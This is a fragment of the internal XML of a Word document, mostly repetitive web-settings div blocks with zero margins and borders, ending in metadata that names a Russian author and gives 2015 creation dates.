        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1276474915">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1347321640">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1379474536">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1461071953">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1512060378">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>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647541753">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1660689074">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1715815552">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1757943390">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1840080073">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1856963940">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="197591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5%D0%BB%D1%8F%D1%86%D0%B8%D0%BE%D0%BD%D0%BD%D0%B0%D1%8F_%D0%A1%D0%A3%D0%91%D0%94"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net.microsoft.com/ru-ru/library/ms190286.aspx"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5CE2D1-F025-49AF-B41A-6BA0947D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33</Pages>
  <Words>6906</Words>
  <Characters>39370</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>328</Lines>
  <Paragraphs>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46184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Попов</dc:creator>
  <cp:lastModifiedBy>Сергей Попов</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-06-02T20:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-06-02T20:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>